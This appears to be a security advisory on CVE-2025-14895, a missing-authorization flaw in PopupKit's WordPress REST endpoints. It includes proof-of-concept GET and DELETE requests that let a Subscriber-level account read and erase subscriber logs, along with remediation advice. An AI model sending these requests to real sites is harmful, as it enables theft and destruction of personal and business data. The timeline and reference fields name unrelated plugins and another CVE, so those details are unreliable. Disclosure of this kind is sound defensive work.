CVE-2025-14895 affects PopupKit and it is a missing authorization vulnerability in REST endpoints that should be restricted to administrators but are reachable by any authenticated user who can obtain a WordPress REST nonce. The most important point is that the endpoint is not just leaking harmless counters. It can return and delete records that represent marketing leads and subscriber activity, which are often treated as sensitive business assets. When a Subscriber can access this data, the plugin breaks the expected privacy and role separation model of WordPress, and it also creates a direct integrity issue because the same low privilege user can erase records and undermine reporting. This vulnerability is particularly relevant on sites with public registration and large numbers of low privilege accounts, which is common in ecommerce, memberships, and community driven properties.
| CVE | CVE-2025-14895 |
| Plugin Version | PopupKit <= 2.2.0 |
| All Time | 338 757 |
| Active installations | 60 000+ |
| Publicly Published | December 16, 2025 |
| Last Updated | December 16, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0554 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/notificationx/notificationx-3111-missing-authorization-to-authenticated-contributor-analytics-reset https://t.me/cleantalk_researches/402 |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| December 16, 2025 | Plugin testing and vulnerability detection in the Unlimited Elements for Elementor have been completed |
| December 16, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| February 9, 2026 | Registered CVE-2025-14895 |
Discovery of the Vulnerability
The root cause is that the server side permission logic relies on nonce validation rather than capability checks aligned to the sensitivity of the resource. The affected endpoints under /pbb/v1 accept authenticated requests with X-WP-Nonce and do not enforce a role or capability that would gate access to subscriber analytics and log management. In practice this becomes an IDOR style access control failure, because the attacker does not need to be assigned any PopupKit management role and does not need to pass a plugin specific permission callback. They only need to be logged in and able to retrieve a REST nonce from any admin context they can reach. Once they have that nonce, the endpoints allow broad queries across time ranges and also allow deletion using the same route, which confirms that authorization is missing rather than only a data scoping mistake.
Understanding of Missing Auth attack’s
In WordPress, nonces are not authorization. They are anti CSRF tokens that confirm request intent for users who are already authorized. When a plugin treats possession of a nonce as permission to access sensitive records, it effectively grants those permissions to every role that can obtain the nonce, which is often far broader than intended. Subscriber analytics and lead data is sensitive because it contains identifiers like email addresses, names, device and event metadata, and sometimes form payloads that can include additional personal data. That creates both privacy and compliance risk, especially for organizations subject to GDPR style obligations. It also creates a business risk because lead lists are revenue generating assets and their deletion can cause real loss. A common real world scenario is a site that allows account creation for purchases or comments. A single attacker account can then harvest a list of leads, export it, and delete it, leaving only incomplete incident evidence. This is why the vulnerability is not just a bug. It enables quiet data theft and quiet data destruction using legitimate looking API calls.
Exploiting the Missing Auth Vulnerability
To exploit CVE-2025-14895, an attacker with Subscriber+ cookies:
POC:
GET /wordpress/index.php?rest_route=/pbb/v1/popup/logs&startDate=2024-01-01&endDate=2025-12-31&type=devices HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0 Accept: application/json, */*;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php X-WP-Nonce: a8a52738ef Connection: keep-alive Cookie: REDACTED Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=4 DELETE /wordpress/index.php?rest_route=/pbb/v1/popup/logs&startDate=2024-01-01&endDate=2025-12-31&type=devices HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0 Accept: application/json, */*;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/post-new.php X-WP-Nonce: a8a52738ef Connection: keep-alive Cookie: REDACTED Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Priority: u=4____
The most direct risk is exposure of personal data and marketing intelligence. An attacker can enumerate analytics over long periods and extract email addresses, names, and behavioral metadata that can be used for phishing, competitive intelligence, or resale. The deletion aspect adds a second dimension. Attackers can erase evidence of lead capture, break attribution reporting, and cause real revenue loss by removing subscriber records that sales and marketing teams rely on. On sites that run campaigns, losing analytics can cause teams to make incorrect decisions and can create financial disputes with advertisers or partners. Another realistic scenario is a competitor or disgruntled user creating an account, harvesting the list, then deleting it to cover tracks and create operational chaos. Because the calls are authenticated and use a valid nonce, they can blend into normal traffic and may not trigger alerts unless the site has strong API logging. The combined confidentiality and integrity impact is why this should be treated as a high value data access control failure rather than a low priority bug.
Recommendations for Improved Security
The fix is to implement strict authorization in the REST permission callbacks and to stop relying on nonce presence as a permission boundary. The endpoints should require a high privilege capability such as manage_options or a dedicated PopupKit capability, and they should enforce object level or tenant scoping where applicable so that only users who are meant to manage subscribers can query and delete analytics. The delete operation should also require a POST or DELETE with a stricter intent token and should be rate limited and logged with actor user ID, IP, and query parameters to support incident response. From an operational perspective, site owners should audit which roles can obtain REST nonces, reduce admin access for low privilege roles, and monitor for unusual patterns such as very large date range queries followed by deletes. If exposure is suspected, assume the subscriber list has been compromised, rotate any related tokens, notify stakeholders as required, and restore analytics from backups if available.
By taking proactive measures to address Missing Auth like CVE-2025-14895 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #MissingAuth #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website